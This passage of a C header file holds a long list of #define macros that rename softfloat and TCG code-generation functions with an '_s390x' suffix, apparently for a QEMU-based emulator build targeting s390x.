#define int64_to_float16_scalbn int64_to_float16_scalbn_s390x
#define int32_to_float16_scalbn int32_to_float16_scalbn_s390x
#define int16_to_float16_scalbn int16_to_float16_scalbn_s390x
#define int64_to_float16 int64_to_float16_s390x
#define int32_to_float16 int32_to_float16_s390x
#define int16_to_float16 int16_to_float16_s390x
#define int64_to_float32_scalbn int64_to_float32_scalbn_s390x
#define int32_to_float32_scalbn int32_to_float32_scalbn_s390x
#define int16_to_float32_scalbn int16_to_float32_scalbn_s390x
#define int64_to_float32 int64_to_float32_s390x
#define int32_to_float32 int32_to_float32_s390x
#define int16_to_float32 int16_to_float32_s390x
#define int64_to_float64_scalbn int64_to_float64_scalbn_s390x
#define int32_to_float64_scalbn int32_to_float64_scalbn_s390x
#define int16_to_float64_scalbn int16_to_float64_scalbn_s390x
#define int64_to_float64 int64_to_float64_s390x
#define int32_to_float64 int32_to_float64_s390x
#define int16_to_float64 int16_to_float64_s390x
#define uint64_to_float16_scalbn uint64_to_float16_scalbn_s390x
#define uint32_to_float16_scalbn uint32_to_float16_scalbn_s390x
#define uint16_to_float16_scalbn uint16_to_float16_scalbn_s390x
#define uint64_to_float16 uint64_to_float16_s390x
#define uint32_to_float16 uint32_to_float16_s390x
#define uint16_to_float16 uint16_to_float16_s390x
#define uint64_to_float32_scalbn uint64_to_float32_scalbn_s390x
#define uint32_to_float32_scalbn uint32_to_float32_scalbn_s390x
#define uint16_to_float32_scalbn uint16_to_float32_scalbn_s390x
#define uint64_to_float32 uint64_to_float32_s390x
#define uint32_to_float32 uint32_to_float32_s390x
#define uint16_to_float32 uint16_to_float32_s390x
#define uint64_to_float64_scalbn uint64_to_float64_scalbn_s390x
#define uint32_to_float64_scalbn uint32_to_float64_scalbn_s390x
#define uint16_to_float64_scalbn uint16_to_float64_scalbn_s390x
#define uint64_to_float64 uint64_to_float64_s390x
#define uint32_to_float64 uint32_to_float64_s390x
#define uint16_to_float64 uint16_to_float64_s390x
#define float16_min float16_min_s390x
#define float16_minnum float16_minnum_s390x
#define float16_minnummag float16_minnummag_s390x
#define float16_max float16_max_s390x
#define float16_maxnum float16_maxnum_s390x
#define float16_maxnummag float16_maxnummag_s390x
#define float32_min float32_min_s390x
#define float32_minnum float32_minnum_s390x
#define float32_minnummag float32_minnummag_s390x
#define float32_max float32_max_s390x
#define float32_maxnum float32_maxnum_s390x
#define float32_maxnummag float32_maxnummag_s390x
#define float64_min float64_min_s390x
#define float64_minnum float64_minnum_s390x
#define float64_minnummag float64_minnummag_s390x
#define float64_max float64_max_s390x
#define float64_maxnum float64_maxnum_s390x
#define float64_maxnummag float64_maxnummag_s390x
#define float16_compare float16_compare_s390x
#define float16_compare_quiet float16_compare_quiet_s390x
#define float32_compare float32_compare_s390x
#define float32_compare_quiet float32_compare_quiet_s390x
#define float64_compare float64_compare_s390x
#define float64_compare_quiet float64_compare_quiet_s390x
#define float16_scalbn float16_scalbn_s390x
#define float32_scalbn float32_scalbn_s390x
#define float64_scalbn float64_scalbn_s390x
#define float16_sqrt float16_sqrt_s390x
#define float32_sqrt float32_sqrt_s390x
#define float64_sqrt float64_sqrt_s390x
#define float16_default_nan float16_default_nan_s390x
#define float32_default_nan float32_default_nan_s390x
#define float64_default_nan float64_default_nan_s390x
#define float128_default_nan float128_default_nan_s390x
#define float16_silence_nan float16_silence_nan_s390x
#define float32_silence_nan float32_silence_nan_s390x
#define float64_silence_nan float64_silence_nan_s390x
#define float16_squash_input_denormal float16_squash_input_denormal_s390x
#define float32_squash_input_denormal float32_squash_input_denormal_s390x
#define float64_squash_input_denormal float64_squash_input_denormal_s390x
#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_s390x
#define roundAndPackFloatx80 roundAndPackFloatx80_s390x
#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_s390x
#define int32_to_floatx80 int32_to_floatx80_s390x
#define int32_to_float128 int32_to_float128_s390x
#define int64_to_floatx80 int64_to_floatx80_s390x
#define int64_to_float128 int64_to_float128_s390x
#define uint64_to_float128 uint64_to_float128_s390x
#define float32_to_floatx80 float32_to_floatx80_s390x
#define float32_to_float128 float32_to_float128_s390x
#define float32_rem float32_rem_s390x
#define float32_exp2 float32_exp2_s390x
#define float32_log2 float32_log2_s390x
#define float32_eq float32_eq_s390x
#define float32_le float32_le_s390x
#define float32_lt float32_lt_s390x
#define float32_unordered float32_unordered_s390x
#define float32_eq_quiet float32_eq_quiet_s390x
#define float32_le_quiet float32_le_quiet_s390x
#define float32_lt_quiet float32_lt_quiet_s390x
#define float32_unordered_quiet float32_unordered_quiet_s390x
#define float64_to_floatx80 float64_to_floatx80_s390x
#define float64_to_float128 float64_to_float128_s390x
#define float64_rem float64_rem_s390x
#define float64_log2 float64_log2_s390x
#define float64_eq float64_eq_s390x
#define float64_le float64_le_s390x
#define float64_lt float64_lt_s390x
#define float64_unordered float64_unordered_s390x
#define float64_eq_quiet float64_eq_quiet_s390x
#define float64_le_quiet float64_le_quiet_s390x
#define float64_lt_quiet float64_lt_quiet_s390x
#define float64_unordered_quiet float64_unordered_quiet_s390x
#define floatx80_to_int32 floatx80_to_int32_s390x
#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_s390x
#define floatx80_to_int64 floatx80_to_int64_s390x
#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_s390x
#define floatx80_to_float32 floatx80_to_float32_s390x
#define floatx80_to_float64 floatx80_to_float64_s390x
#define floatx80_to_float128 floatx80_to_float128_s390x
#define floatx80_round floatx80_round_s390x
#define floatx80_round_to_int floatx80_round_to_int_s390x
#define floatx80_add floatx80_add_s390x
#define floatx80_sub floatx80_sub_s390x
#define floatx80_mul floatx80_mul_s390x
#define floatx80_div floatx80_div_s390x
#define floatx80_rem floatx80_rem_s390x
#define floatx80_sqrt floatx80_sqrt_s390x
#define floatx80_eq floatx80_eq_s390x
#define floatx80_le floatx80_le_s390x
#define floatx80_lt floatx80_lt_s390x
#define floatx80_unordered floatx80_unordered_s390x
#define floatx80_eq_quiet floatx80_eq_quiet_s390x
#define floatx80_le_quiet floatx80_le_quiet_s390x
#define floatx80_lt_quiet floatx80_lt_quiet_s390x
#define floatx80_unordered_quiet floatx80_unordered_quiet_s390x
#define float128_to_int32 float128_to_int32_s390x
#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_s390x
#define float128_to_int64 float128_to_int64_s390x
#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_s390x
#define float128_to_uint64 float128_to_uint64_s390x
#define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_s390x
#define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_s390x
#define float128_to_uint32 float128_to_uint32_s390x
#define float128_to_float32 float128_to_float32_s390x
#define float128_to_float64 float128_to_float64_s390x
#define float128_to_floatx80 float128_to_floatx80_s390x
#define float128_round_to_int float128_round_to_int_s390x
#define float128_add float128_add_s390x
#define float128_sub float128_sub_s390x
#define float128_mul float128_mul_s390x
#define float128_div float128_div_s390x
#define float128_rem float128_rem_s390x
#define float128_sqrt float128_sqrt_s390x
#define float128_eq float128_eq_s390x
#define float128_le float128_le_s390x
#define float128_lt float128_lt_s390x
#define float128_unordered float128_unordered_s390x
#define float128_eq_quiet float128_eq_quiet_s390x
#define float128_le_quiet float128_le_quiet_s390x
#define float128_lt_quiet float128_lt_quiet_s390x
#define float128_unordered_quiet float128_unordered_quiet_s390x
#define floatx80_compare floatx80_compare_s390x
#define floatx80_compare_quiet floatx80_compare_quiet_s390x
#define float128_compare float128_compare_s390x
#define float128_compare_quiet float128_compare_quiet_s390x
#define floatx80_scalbn floatx80_scalbn_s390x
#define float128_scalbn float128_scalbn_s390x
#define softfloat_init softfloat_init_s390x
#define tcg_optimize tcg_optimize_s390x
#define gen_new_label gen_new_label_s390x
#define tcg_can_emit_vec_op tcg_can_emit_vec_op_s390x
#define tcg_expand_vec_op tcg_expand_vec_op_s390x
#define tcg_register_jit tcg_register_jit_s390x
#define tcg_tb_insert tcg_tb_insert_s390x
#define tcg_tb_remove tcg_tb_remove_s390x
#define tcg_tb_lookup tcg_tb_lookup_s390x
#define tcg_tb_foreach tcg_tb_foreach_s390x
#define tcg_nb_tbs tcg_nb_tbs_s390x
#define tcg_region_reset_all tcg_region_reset_all_s390x
#define tcg_region_init tcg_region_init_s390x
#define tcg_code_size tcg_code_size_s390x
#define tcg_code_capacity tcg_code_capacity_s390x
#define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_s390x
#define tcg_malloc_internal tcg_malloc_internal_s390x
#define tcg_pool_reset tcg_pool_reset_s390x
#define tcg_context_init tcg_context_init_s390x
#define tcg_tb_alloc tcg_tb_alloc_s390x
#define tcg_prologue_init tcg_prologue_init_s390x
#define tcg_func_start tcg_func_start_s390x
#define tcg_set_frame tcg_set_frame_s390x
#define tcg_global_mem_new_internal tcg_global_mem_new_internal_s390x
#define tcg_temp_new_internal tcg_temp_new_internal_s390x
#define tcg_temp_new_vec tcg_temp_new_vec_s390x
#define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_s390x
#define tcg_temp_free_internal tcg_temp_free_internal_s390x
#define tcg_const_i32 tcg_const_i32_s390x
#define tcg_const_i64 tcg_const_i64_s390x
#define tcg_const_local_i32 tcg_const_local_i32_s390x
#define tcg_const_local_i64 tcg_const_local_i64_s390x
#define tcg_op_supported
tcg_op_supported_s390x #define tcg_gen_callN tcg_gen_callN_s390x #define tcg_op_remove tcg_op_remove_s390x #define tcg_emit_op tcg_emit_op_s390x #define tcg_op_insert_before tcg_op_insert_before_s390x #define tcg_op_insert_after tcg_op_insert_after_s390x #define tcg_cpu_exec_time tcg_cpu_exec_time_s390x #define tcg_gen_code tcg_gen_code_s390x #define tcg_gen_op1 tcg_gen_op1_s390x #define tcg_gen_op2 tcg_gen_op2_s390x #define tcg_gen_op3 tcg_gen_op3_s390x #define tcg_gen_op4 tcg_gen_op4_s390x #define tcg_gen_op5 tcg_gen_op5_s390x #define tcg_gen_op6 tcg_gen_op6_s390x #define tcg_gen_mb tcg_gen_mb_s390x #define tcg_gen_addi_i32 tcg_gen_addi_i32_s390x #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_s390x #define tcg_gen_subi_i32 tcg_gen_subi_i32_s390x #define tcg_gen_andi_i32 tcg_gen_andi_i32_s390x #define tcg_gen_ori_i32 tcg_gen_ori_i32_s390x #define tcg_gen_xori_i32 tcg_gen_xori_i32_s390x #define tcg_gen_shli_i32 tcg_gen_shli_i32_s390x #define tcg_gen_shri_i32 tcg_gen_shri_i32_s390x #define tcg_gen_sari_i32 tcg_gen_sari_i32_s390x #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_s390x #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_s390x #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_s390x #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_s390x #define tcg_gen_muli_i32 tcg_gen_muli_i32_s390x #define tcg_gen_div_i32 tcg_gen_div_i32_s390x #define tcg_gen_rem_i32 tcg_gen_rem_i32_s390x #define tcg_gen_divu_i32 tcg_gen_divu_i32_s390x #define tcg_gen_remu_i32 tcg_gen_remu_i32_s390x #define tcg_gen_andc_i32 tcg_gen_andc_i32_s390x #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_s390x #define tcg_gen_nand_i32 tcg_gen_nand_i32_s390x #define tcg_gen_nor_i32 tcg_gen_nor_i32_s390x #define tcg_gen_orc_i32 tcg_gen_orc_i32_s390x #define tcg_gen_clz_i32 tcg_gen_clz_i32_s390x #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_s390x #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_s390x #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_s390x #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_s390x #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_s390x #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_s390x #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_s390x #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_s390x #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_s390x #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_s390x #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_s390x #define tcg_gen_extract_i32 tcg_gen_extract_i32_s390x #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_s390x #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_s390x #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_s390x #define tcg_gen_add2_i32 tcg_gen_add2_i32_s390x #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_s390x #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_s390x #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_s390x #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_s390x #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_s390x #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_s390x #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_s390x #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_s390x #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_s390x #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_s390x #define tcg_gen_smin_i32 tcg_gen_smin_i32_s390x #define tcg_gen_umin_i32 tcg_gen_umin_i32_s390x #define tcg_gen_smax_i32 tcg_gen_smax_i32_s390x #define tcg_gen_umax_i32 tcg_gen_umax_i32_s390x #define tcg_gen_abs_i32 tcg_gen_abs_i32_s390x #define tcg_gen_addi_i64 tcg_gen_addi_i64_s390x #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_s390x #define tcg_gen_subi_i64 tcg_gen_subi_i64_s390x #define tcg_gen_andi_i64 tcg_gen_andi_i64_s390x #define 
tcg_gen_ori_i64 tcg_gen_ori_i64_s390x #define tcg_gen_xori_i64 tcg_gen_xori_i64_s390x #define tcg_gen_shli_i64 tcg_gen_shli_i64_s390x #define tcg_gen_shri_i64 tcg_gen_shri_i64_s390x #define tcg_gen_sari_i64 tcg_gen_sari_i64_s390x #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_s390x #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_s390x #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_s390x #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_s390x #define tcg_gen_muli_i64 tcg_gen_muli_i64_s390x #define tcg_gen_div_i64 tcg_gen_div_i64_s390x #define tcg_gen_rem_i64 tcg_gen_rem_i64_s390x #define tcg_gen_divu_i64 tcg_gen_divu_i64_s390x #define tcg_gen_remu_i64 tcg_gen_remu_i64_s390x #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_s390x #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_s390x #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_s390x #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_s390x #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_s390x #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_s390x #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_s390x #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_s390x #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_s390x #define tcg_gen_not_i64 tcg_gen_not_i64_s390x #define tcg_gen_andc_i64 tcg_gen_andc_i64_s390x #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_s390x #define tcg_gen_nand_i64 tcg_gen_nand_i64_s390x #define tcg_gen_nor_i64 tcg_gen_nor_i64_s390x #define tcg_gen_orc_i64 tcg_gen_orc_i64_s390x #define tcg_gen_clz_i64 tcg_gen_clz_i64_s390x #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_s390x #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_s390x #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_s390x #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_s390x #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_s390x #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_s390x #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_s390x #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_s390x #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_s390x #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_s390x #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_s390x #define tcg_gen_extract_i64 tcg_gen_extract_i64_s390x #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_s390x #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_s390x #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_s390x #define tcg_gen_add2_i64 tcg_gen_add2_i64_s390x #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_s390x #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_s390x #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_s390x #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_s390x #define tcg_gen_smin_i64 tcg_gen_smin_i64_s390x #define tcg_gen_umin_i64 tcg_gen_umin_i64_s390x #define tcg_gen_smax_i64 tcg_gen_smax_i64_s390x #define tcg_gen_umax_i64 tcg_gen_umax_i64_s390x #define tcg_gen_abs_i64 tcg_gen_abs_i64_s390x #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_s390x #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_s390x #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_s390x #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_s390x #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_s390x #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_s390x #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_s390x #define tcg_gen_exit_tb tcg_gen_exit_tb_s390x #define tcg_gen_goto_tb tcg_gen_goto_tb_s390x #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_s390x #define check_exit_request check_exit_request_s390x #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_s390x #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_s390x #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_s390x #define tcg_gen_qemu_st_i64 
tcg_gen_qemu_st_i64_s390x #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_s390x #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_s390x #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_s390x #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_s390x #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_s390x #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_s390x #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_s390x #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_s390x #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_s390x #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_s390x #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_s390x #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_s390x #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_s390x #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_s390x #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_s390x #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_s390x #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_s390x #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_s390x #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_s390x #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_s390x #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_s390x #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_s390x #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_s390x #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_s390x #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_s390x #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_s390x #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_s390x #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_s390x #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_s390x #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_s390x #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_s390x #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_s390x #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_s390x #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_s390x #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_s390x #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_s390x #define simd_desc simd_desc_s390x #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_s390x #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_s390x #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_s390x #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_s390x #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_s390x #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_s390x #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_s390x #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_s390x #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_s390x #define tcg_gen_gvec_2 tcg_gen_gvec_2_s390x #define tcg_gen_gvec_2i tcg_gen_gvec_2i_s390x #define tcg_gen_gvec_2s tcg_gen_gvec_2s_s390x #define tcg_gen_gvec_3 tcg_gen_gvec_3_s390x #define tcg_gen_gvec_3i tcg_gen_gvec_3i_s390x #define tcg_gen_gvec_4 tcg_gen_gvec_4_s390x #define tcg_gen_gvec_mov tcg_gen_gvec_mov_s390x #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_s390x #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_s390x 
#define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_s390x #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_s390x #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_s390x #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_s390x #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_s390x #define tcg_gen_gvec_not tcg_gen_gvec_not_s390x #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_s390x #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_s390x #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_s390x #define tcg_gen_gvec_add tcg_gen_gvec_add_s390x #define tcg_gen_gvec_adds tcg_gen_gvec_adds_s390x #define tcg_gen_gvec_addi tcg_gen_gvec_addi_s390x #define tcg_gen_gvec_subs tcg_gen_gvec_subs_s390x #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_s390x #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_s390x #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_s390x #define tcg_gen_gvec_sub tcg_gen_gvec_sub_s390x #define tcg_gen_gvec_mul tcg_gen_gvec_mul_s390x #define tcg_gen_gvec_muls tcg_gen_gvec_muls_s390x #define tcg_gen_gvec_muli tcg_gen_gvec_muli_s390x #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_s390x #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_s390x #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_s390x #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_s390x #define tcg_gen_gvec_smin tcg_gen_gvec_smin_s390x #define tcg_gen_gvec_umin tcg_gen_gvec_umin_s390x #define tcg_gen_gvec_smax tcg_gen_gvec_smax_s390x #define tcg_gen_gvec_umax tcg_gen_gvec_umax_s390x #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_s390x #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_s390x #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_s390x #define tcg_gen_gvec_neg tcg_gen_gvec_neg_s390x #define tcg_gen_gvec_abs tcg_gen_gvec_abs_s390x #define tcg_gen_gvec_and tcg_gen_gvec_and_s390x #define tcg_gen_gvec_or tcg_gen_gvec_or_s390x #define tcg_gen_gvec_xor tcg_gen_gvec_xor_s390x #define tcg_gen_gvec_andc tcg_gen_gvec_andc_s390x #define tcg_gen_gvec_orc tcg_gen_gvec_orc_s390x #define tcg_gen_gvec_nand tcg_gen_gvec_nand_s390x #define tcg_gen_gvec_nor tcg_gen_gvec_nor_s390x #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_s390x #define tcg_gen_gvec_ands tcg_gen_gvec_ands_s390x #define tcg_gen_gvec_andi tcg_gen_gvec_andi_s390x #define tcg_gen_gvec_xors tcg_gen_gvec_xors_s390x #define tcg_gen_gvec_xori tcg_gen_gvec_xori_s390x #define tcg_gen_gvec_ors tcg_gen_gvec_ors_s390x #define tcg_gen_gvec_ori tcg_gen_gvec_ori_s390x #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_s390x #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_s390x #define tcg_gen_gvec_shli tcg_gen_gvec_shli_s390x #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_s390x #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_s390x #define tcg_gen_gvec_shri tcg_gen_gvec_shri_s390x #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_s390x #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_s390x #define tcg_gen_gvec_sari tcg_gen_gvec_sari_s390x #define tcg_gen_gvec_shls tcg_gen_gvec_shls_s390x #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_s390x #define tcg_gen_gvec_sars tcg_gen_gvec_sars_s390x #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_s390x #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_s390x #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_s390x #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_s390x #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_s390x #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_s390x #define vec_gen_2 vec_gen_2_s390x #define vec_gen_3 vec_gen_3_s390x #define vec_gen_4 vec_gen_4_s390x #define tcg_gen_mov_vec tcg_gen_mov_vec_s390x #define 
tcg_const_zeros_vec tcg_const_zeros_vec_s390x #define tcg_const_ones_vec tcg_const_ones_vec_s390x #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_s390x #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_s390x #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_s390x #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_s390x #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_s390x #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_s390x #define tcg_gen_dupi_vec tcg_gen_dupi_vec_s390x #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_s390x #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_s390x #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_s390x #define tcg_gen_ld_vec tcg_gen_ld_vec_s390x #define tcg_gen_st_vec tcg_gen_st_vec_s390x #define tcg_gen_stl_vec tcg_gen_stl_vec_s390x #define tcg_gen_and_vec tcg_gen_and_vec_s390x #define tcg_gen_or_vec tcg_gen_or_vec_s390x #define tcg_gen_xor_vec tcg_gen_xor_vec_s390x #define tcg_gen_andc_vec tcg_gen_andc_vec_s390x #define tcg_gen_orc_vec tcg_gen_orc_vec_s390x #define tcg_gen_nand_vec tcg_gen_nand_vec_s390x #define tcg_gen_nor_vec tcg_gen_nor_vec_s390x #define tcg_gen_eqv_vec tcg_gen_eqv_vec_s390x #define tcg_gen_not_vec tcg_gen_not_vec_s390x #define tcg_gen_neg_vec tcg_gen_neg_vec_s390x #define tcg_gen_abs_vec tcg_gen_abs_vec_s390x #define tcg_gen_shli_vec tcg_gen_shli_vec_s390x #define tcg_gen_shri_vec tcg_gen_shri_vec_s390x #define tcg_gen_sari_vec tcg_gen_sari_vec_s390x #define tcg_gen_cmp_vec tcg_gen_cmp_vec_s390x #define tcg_gen_add_vec tcg_gen_add_vec_s390x #define tcg_gen_sub_vec tcg_gen_sub_vec_s390x #define 